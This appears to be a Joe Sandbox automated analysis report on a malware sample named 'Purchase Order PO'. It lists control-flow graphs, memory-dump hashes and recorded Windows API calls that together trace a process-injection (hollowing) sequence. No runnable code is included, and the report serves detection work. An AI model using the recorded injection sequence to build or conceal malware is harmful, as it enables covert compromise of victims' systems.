                                                                                                                            • Opcode ID: 252653bf9374de7f6c43c734aba9a538713e1ec72f9610d1e8b292de33eb2f23
                                                                                                                            • Instruction ID: ffd2503380e679e40afe43ea6ae1002d4a6925c1799d1e4177370825a87db42a
                                                                                                                            • Opcode Fuzzy Hash: 252653bf9374de7f6c43c734aba9a538713e1ec72f9610d1e8b292de33eb2f23
                                                                                                                            • Instruction Fuzzy Hash: E2B19A303082159FCB159E28D894B7B7BE6FBC8354F16856AEA46CB391DF35C841C7A4

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1667 5df4fc8-5df4fd5 1668 5df4fdd-5df4fdf 1667->1668 1669 5df4fd7-5df4fdb 1667->1669 1671 5df51f0-5df51f7 1668->1671 1669->1668 1670 5df4fe4-5df4fef 1669->1670 1672 5df51f8 1670->1672 1673 5df4ff5-5df4ffc 1670->1673 1676 5df51fd-5df5209 1672->1676 1674 5df5002-5df5011 1673->1674 1675 5df5191-5df5197 1673->1675 1674->1676 1677 5df5017-5df5026 1674->1677 1678 5df519d-5df51a1 1675->1678 1679 5df5199-5df519b 1675->1679 1688 5df520b-5df5235 1676->1688 1689 5df5252-5df525e 1676->1689 1685 5df503b-5df503e 1677->1685 1686 5df5028-5df502b 1677->1686 1680 5df51ee 1678->1680 1681 5df51a3-5df51a9 1678->1681 1679->1671 1680->1671 1681->1672 1683 5df51ab-5df51ae 1681->1683 1683->1672 1687 5df51b0-5df51c5 1683->1687 1691 5df504a-5df5050 1685->1691 1692 5df5040-5df5043 1685->1692 1690 5df502d-5df5030 1686->1690 1686->1691 1703 5df51e9-5df51ec 1687->1703 1704 5df51c7-5df51cd 1687->1704 1705 5df523e-5df5242 1688->1705 1706 5df5237-5df523c 1688->1706 1700 5df5036 1690->1700 1701 5df5131-5df5137 1690->1701 1697 5df5068-5df5085 1691->1697 1698 5df5052-5df5058 1691->1698 1693 5df5096-5df509c 1692->1693 1694 5df5045 1692->1694 1711 5df509e-5df50a4 1693->1711 1712 5df50b4-5df50c6 1693->1712 1702 5df515c-5df5169 1694->1702 1742 5df508e-5df5091 1697->1742 1707 5df505c-5df5066 1698->1707 1708 5df505a 1698->1708 1700->1702 1709 5df514f-5df5159 1701->1709 1710 5df5139-5df513f 1701->1710 1729 5df517d-5df517f 1702->1729 1730 5df516b-5df516f 1702->1730 1703->1671 1715 5df51df-5df51e2 1704->1715 1716 5df51cf-5df51dd 1704->1716 1717 5df5248-5df524a 1705->1717 1706->1717 1707->1697 1708->1697 1709->1702 1719 5df5143-5df514d 1710->1719 1720 5df5141 1710->1720 1713 5df50a8-5df50b2 1711->1713 1714 5df50a6 1711->1714 1732 5df50c8-5df50d4 1712->1732 1733 5df50d6-5df50f9 1712->1733 1713->1712 1714->1712 1715->1672 1721 5df51e4-5df51e7 1715->1721 1716->1672 1716->1715 1725 5df525f-5df5266 1717->1725 1726 5df524c 1717->1726 1719->1709 1720->1709 1721->1703 1721->1704 1726->1689 1737 5df5183-5df5186 1729->1737 1730->1729 1736 5df5171-5df5175 1730->1736 1743 5df5121-5df512f 1732->1743 1733->1672 1746 5df50ff-5df5102 1733->1746 1736->1672 1738 5df517b 1736->1738 1737->1672 1739 5df5188-5df518b 1737->1739 1738->1737 1739->1674 1739->1675 1742->1702 1743->1702 1746->1672 1747 5df5108-5df511a 1746->1747 1747->1743
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,bq$,bq
                                                                                                                            • API String ID: 0-2699258169
                                                                                                                            • Opcode ID: 4675dc0820f09dc81573764bb8bb268a74f31689414d58f92f5556e580a7c3df
                                                                                                                            • Instruction ID: 083ce9ad4bfc9f62a04e8d73930999857769027cd4dd006d816e8a3f669e65af
                                                                                                                            • Opcode Fuzzy Hash: 4675dc0820f09dc81573764bb8bb268a74f31689414d58f92f5556e580a7c3df
                                                                                                                            • Instruction Fuzzy Hash: CE819334B05105DFCB14CF69E88496EB7F2FF89214F16816AD616EB365EB31E841CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2259 74670cd-746716d 2262 74671a6-74671c6 2259->2262 2263 746716f-7467179 2259->2263 2270 74671ff-746722e 2262->2270 2271 74671c8-74671d2 2262->2271 2263->2262 2264 746717b-746717d 2263->2264 2266 74671a0-74671a3 2264->2266 2267 746717f-7467189 2264->2267 2266->2262 2268 746718d-746719c 2267->2268 2269 746718b 2267->2269 2268->2268 2272 746719e 2268->2272 2269->2268 2277 7467267-7467321 CreateProcessA 2270->2277 2278 7467230-746723a 2270->2278 2271->2270 2273 74671d4-74671d6 2271->2273 2272->2266 2275 74671d8-74671e2 2273->2275 2276 74671f9-74671fc 2273->2276 2279 74671e6-74671f5 2275->2279 2280 74671e4 2275->2280 2276->2270 2291 7467323-7467329 2277->2291 2292 746732a-74673b0 2277->2292 2278->2277 2281 746723c-746723e 2278->2281 2279->2279 2282 74671f7 2279->2282 2280->2279 2283 7467240-746724a 2281->2283 2284 7467261-7467264 2281->2284 2282->2276 2286 746724e-746725d 2283->2286 2287 746724c 2283->2287 2284->2277 2286->2286 2288 746725f 2286->2288 2287->2286 2288->2284 2291->2292 2302 74673b2-74673b6 2292->2302 2303 74673c0-74673c4 2292->2303 2302->2303 2304 74673b8 2302->2304 2305 74673c6-74673ca 2303->2305 2306 74673d4-74673d8 2303->2306 2304->2303 2305->2306 2307 74673cc 2305->2307 2308 74673da-74673de 2306->2308 2309 74673e8-74673ec 2306->2309 2307->2306 2308->2309 2310 74673e0 2308->2310 2311 74673fe-7467405 2309->2311 2312 74673ee-74673f4 2309->2312 2310->2309 2313 7467407-7467416 2311->2313 2314 746741c 2311->2314 2312->2311 2313->2314 2316 746741d 2314->2316 2316->2316
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746730E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 57c348a7efeb60cd6f43cd52b02fdd3bf8fba434c7140b6a516143ce3d693c83
                                                                                                                            • Instruction ID: a7ceeadcd7a5e075b47bbe99302f072c6e840be9e176d2ff0dbf3f4350cfcfee
                                                                                                                            • Opcode Fuzzy Hash: 57c348a7efeb60cd6f43cd52b02fdd3bf8fba434c7140b6a516143ce3d693c83
                                                                                                                            • Instruction Fuzzy Hash: 39A15DB1D0021ADFDB15CF68C8457DEBBB2BF48314F1481AAE858A7340DB749985CF92
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0746730E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 9afa0c31b24379234b53e55e859b31aa7f9f8c36ad81734de558bc7067f46e32
                                                                                                                            • Instruction ID: 6f3698b5f807288185fe243bb1671a458ab3ea8ad51f7a28fa8eb9b5c35ae8ea
                                                                                                                            • Opcode Fuzzy Hash: 9afa0c31b24379234b53e55e859b31aa7f9f8c36ad81734de558bc7067f46e32
                                                                                                                            • Instruction Fuzzy Hash: 85915CB1D0021ADFDB15CF68C845BDEBBB2BF48314F1481AAE858A7340DB749985CF92
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0114B3A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 58b2064a8027e1623609aabbaee9ab0f47bce0889cea5da275ecae7fbdc38bdd
                                                                                                                            • Instruction ID: c420568c116007c36c34299800a93b26d8c2cbdab1077b59472989d4efa3eb4f
                                                                                                                            • Opcode Fuzzy Hash: 58b2064a8027e1623609aabbaee9ab0f47bce0889cea5da275ecae7fbdc38bdd
                                                                                                                            • Instruction Fuzzy Hash: ED713470A04B058FD728DF6AD540B9ABBF2FF88704F00892DD48AD7A50DB34E949CB94
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 01145F59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 28d879b330a994ef5cc7eb41aaae3ce0830abef771704ba5e5dd0c403a34e239
                                                                                                                            • Instruction ID: 75b0edc6bb03fda96366734389bc28c617f632b1f836ee8a677146796896473e
                                                                                                                            • Opcode Fuzzy Hash: 28d879b330a994ef5cc7eb41aaae3ce0830abef771704ba5e5dd0c403a34e239
                                                                                                                            • Instruction Fuzzy Hash: F64102B0C00719CFDB24CFA9C9447CEBBB6BF48704F24806AD409AB255DB755945CF91
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 01145F59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: c9c9591eb37ae70b9db478b24de649c9afe16ba2f734a8f5730c49c6e2229c99
                                                                                                                            • Instruction ID: 750d3c79a02df982d871e24c52395b19dcd7bae25a83116ad2a7ebb892a8deff
                                                                                                                            • Opcode Fuzzy Hash: c9c9591eb37ae70b9db478b24de649c9afe16ba2f734a8f5730c49c6e2229c99
                                                                                                                            • Instruction Fuzzy Hash: 2641F2B0C00719CBDB28CFA9C94478EFBB6BF48704F2480AAD419AB255DB756945CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 0-2766056989
                                                                                                                            • Opcode ID: 569c8fc11b16bea9fd39aa308adfe74604077758bcf6bea825426b422183f2d0
                                                                                                                            • Instruction ID: 7e5dc87896c39b151b599bd886bdf09ef1047eda75a5ef3e78e9e68e6f093c4b
                                                                                                                            • Opcode Fuzzy Hash: 569c8fc11b16bea9fd39aa308adfe74604077758bcf6bea825426b422183f2d0
                                                                                                                            • Instruction Fuzzy Hash: D4F1C174E042188FDB50DFA9C981A9DBBF2FB49314F1491AAD919EB345EB309A81CF50
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466D36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: 3abac6c3999db346b7ca26244e7910749afeb8d4107a322c57f8c2d97440de6f
                                                                                                                            • Instruction ID: 6281cbe57834a6cdd55964abe6cfe057d14e740e894ca4a2de1d7ebe9596cf17
                                                                                                                            • Opcode Fuzzy Hash: 3abac6c3999db346b7ca26244e7910749afeb8d4107a322c57f8c2d97440de6f
                                                                                                                            • Instruction Fuzzy Hash: 48219AB19003099FCB20CFA9C4447EEBFF0EF49350F15842AD599A7240C7789945CFA2
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466EE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: 88b1e6fab669e655a8aef0315f0ed282398f5e9b9bdc1ffafd1645742e027dc3
                                                                                                                            • Instruction ID: 5e18b83ab27b8f109482093ef7b4af8c31da6cb99abbe81c61c6bd0117abc5d0
                                                                                                                            • Opcode Fuzzy Hash: 88b1e6fab669e655a8aef0315f0ed282398f5e9b9bdc1ffafd1645742e027dc3
                                                                                                                            • Instruction Fuzzy Hash: CF2157B59003599FDB10CFA9C885BDEBBF5FF48310F10842AE958A7240C7799954CFA5
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466EE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: 2f3e3f2499eb945857b20d2b0d9e1173500d4c65f49265f5321ed213dcc1444c
                                                                                                                            • Instruction ID: 87392b7b4f52bda9152b37f0325158212f927ee65ce2052bff3649b9cadad267
                                                                                                                            • Opcode Fuzzy Hash: 2f3e3f2499eb945857b20d2b0d9e1173500d4c65f49265f5321ed213dcc1444c
                                                                                                                            • Instruction Fuzzy Hash: 1A2136B5900359DFCB10CFAAC885BDEBBF5FF48310F10842AE958A7250C7799954CBA5
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07466FC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            • Opcode ID: c66fc4e7642bc0c1b3e4ecd1916aa4fff692b9991976165355d7cd169d770e76
                                                                                                                            • Instruction ID: e652d113ded13c4a71da58e3e6aac942457b28b420caa477edf11f211480a20c
                                                                                                                            • Opcode Fuzzy Hash: c66fc4e7642bc0c1b3e4ecd1916aa4fff692b9991976165355d7cd169d770e76
                                                                                                                            • Instruction Fuzzy Hash: B12148B1800359DFDB10CFAAC845ADEFBF5FF48320F10842AE958A7250C734A944CBA5
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 185e0bf11e5006a25a6ae0c4b07c20aa8c99381f19c86e18a617ab5d3d1229e8
                                                                                                                            • Instruction ID: 95a523d0e57a834c030af63b3011488ee90f6de839937b7c0e10452bbaaead61
                                                                                                                            • Opcode Fuzzy Hash: 185e0bf11e5006a25a6ae0c4b07c20aa8c99381f19c86e18a617ab5d3d1229e8
                                                                                                                            • Instruction Fuzzy Hash: 3E21E0B5900258DFDB10CFAAD984ADEBBF5EB48310F14801AE958B7350C378A954CFA4
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07466FC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            • Opcode ID: 0836848f8cf75bd1294a0796c43154b75a6a0596b95f528f33c5fa20d6ae4ef2
                                                                                                                            • Instruction ID: da37950ce9efdd2b710a5976f6a761b2bee7240a6735570d8233ce8a9134d274
                                                                                                                            • Opcode Fuzzy Hash: 0836848f8cf75bd1294a0796c43154b75a6a0596b95f528f33c5fa20d6ae4ef2
                                                                                                                            • Instruction Fuzzy Hash: EE2139B1D003599FCB10DFAAC844ADEFBF5FF48310F10842AE558A7250C7359544CBA5
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466D36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: 33618b747ae62713c9fcdeb22b5e27b0cd248a79fe30c9d4291522da1d209bad
                                                                                                                            • Instruction ID: 9354445ff6bff6aedb980b291eea61a6726ac0a95552cbceb76afe458bb033cf
                                                                                                                            • Opcode Fuzzy Hash: 33618b747ae62713c9fcdeb22b5e27b0cd248a79fe30c9d4291522da1d209bad
                                                                                                                            • Instruction Fuzzy Hash: CE2138B19003098FDB10DFAAC4857EEFBF4EF48324F14842AD559A7240C7789945CFA5
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0114D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: ac03681c5728e88554420983149cb6fdb96a479deecbf69f0750e6c773216162
                                                                                                                            • Instruction ID: 67277276ffe70aa470defa15d1f42063585ee09fe5d8c7a4f8248103da270494
                                                                                                                            • Opcode Fuzzy Hash: ac03681c5728e88554420983149cb6fdb96a479deecbf69f0750e6c773216162
                                                                                                                            • Instruction Fuzzy Hash: C321E2B59002589FDB10CFAAD984ADEFFF9EB48320F14801AE958A7310C374A940CFA5
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07466DFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 4e8096c237f6d8bf4b77bcb0abfb10c9d6708b444ff9467564a6fbc173806de7
                                                                                                                            • Instruction ID: 98148955917f4a153e96ac5fe8337c32846fd5dac46748db63ca2ef9617e4a9e
                                                                                                                            • Opcode Fuzzy Hash: 4e8096c237f6d8bf4b77bcb0abfb10c9d6708b444ff9467564a6fbc173806de7
                                                                                                                            • Instruction Fuzzy Hash: A21147B18002499FCB10DFAAC845ADEBBF5EB48324F14842AE959A7250C735A954CFA5
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07466DFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 3fedf3ad53d03186951d70c81ee129340e5f94738e49409f11dd2197e0d4ed00
                                                                                                                            • Instruction ID: 92ac399a909e2993e37ec3c734129b01d7dc8ceab4ee89fe95a0e8dafceff65a
                                                                                                                            • Opcode Fuzzy Hash: 3fedf3ad53d03186951d70c81ee129340e5f94738e49409f11dd2197e0d4ed00
                                                                                                                            • Instruction Fuzzy Hash: 6D1156B18002499FCB10DFAAC844ADFFBF5EB88324F20841AE559A7250C735A950CFA5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 1444ed27f1b8a8d2fceb6dfbbb4678dcdf34081d8f274c72ac516c5d850e791e
                                                                                                                            • Instruction ID: d8047e5922e9e8b42508f463f3827f4513a139174e252caf2544d730f24289b1
                                                                                                                            • Opcode Fuzzy Hash: 1444ed27f1b8a8d2fceb6dfbbb4678dcdf34081d8f274c72ac516c5d850e791e
                                                                                                                            • Instruction Fuzzy Hash: 0F1158B19002898FDB20DFAAC4457DFFFF5EB88724F24842AC459A7250C775A544CF95
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 224f5993b192b97cc947c71c88dafcd45e280faad9f3bfbda715b0407e30113b
                                                                                                                            • Instruction ID: a2818d8ce1cadc25bd8ad5b9581a5acd4f9292154487b1154b9806dea4c9ec81
                                                                                                                            • Opcode Fuzzy Hash: 224f5993b192b97cc947c71c88dafcd45e280faad9f3bfbda715b0407e30113b
                                                                                                                            • Instruction Fuzzy Hash: 5C1136B1D003498FDB20DFAAC4457DEFBF5EB88324F24842AD459A7250CB75A944CFA5
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0114B3A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 641865c5a264563f065983982439c25402a8cc0404bc5e6b0973452478aa007f
                                                                                                                            • Instruction ID: c35964851a765ff57b5baeda4e99b99d17937d8669d5be31b3a32c48703c081a
                                                                                                                            • Opcode Fuzzy Hash: 641865c5a264563f065983982439c25402a8cc0404bc5e6b0973452478aa007f
                                                                                                                            • Instruction Fuzzy Hash: 511110B5C043498FDB14CF9AC444ADEFBF4AB88720F10842AD868B7210C375A545CFA5
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 074693DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            • Opcode ID: bf36765a8989fcbc5c11d14acf484b9296606405636ebb2ec3b8eba9e97041f8
                                                                                                                            • Instruction ID: c3a3504ad4d65b3713b38f647451168571dc8b6a08e5d241c84461f75b6f5755
                                                                                                                            • Opcode Fuzzy Hash: bf36765a8989fcbc5c11d14acf484b9296606405636ebb2ec3b8eba9e97041f8
                                                                                                                            • Instruction Fuzzy Hash: CC1106B5800349DFDB10DF9AC588BDEFBF8EB48310F10845AE558A7250C3B5A984CFA5
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 074693DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            • Opcode ID: 7d331eda338d08ebff749cea08569d1c3a88d5905c41d236b0ab592c47a8d8e2
                                                                                                                            • Instruction ID: 110579cc13372c02bfa882f510a53c5879280051fe32b9385994c3d58d6cd15b
                                                                                                                            • Opcode Fuzzy Hash: 7d331eda338d08ebff749cea08569d1c3a88d5905c41d236b0ab592c47a8d8e2
                                                                                                                            • Instruction Fuzzy Hash: BE11F5B5800349DFDB10DF9AD485BDEFBF8EB48324F10841AE958A7250C375A984CFA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LR^q
                                                                                                                            • API String ID: 0-2625958711
                                                                                                                            • Opcode ID: 53c14efefe6e4ace286448351613928e00d7d69f1a211d4deb60b7d858cea243
                                                                                                                            • Instruction ID: 8f971929908e8d9ac4e8d3b1589b12aaa1e8dcafd6c40589954ff59f52393dc1
                                                                                                                            • Opcode Fuzzy Hash: 53c14efefe6e4ace286448351613928e00d7d69f1a211d4deb60b7d858cea243
                                                                                                                            • Instruction Fuzzy Hash: 1B91F574E042089FDB04CFA9D881AADBBF2FF49314F20852AE919EB345DB319942CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
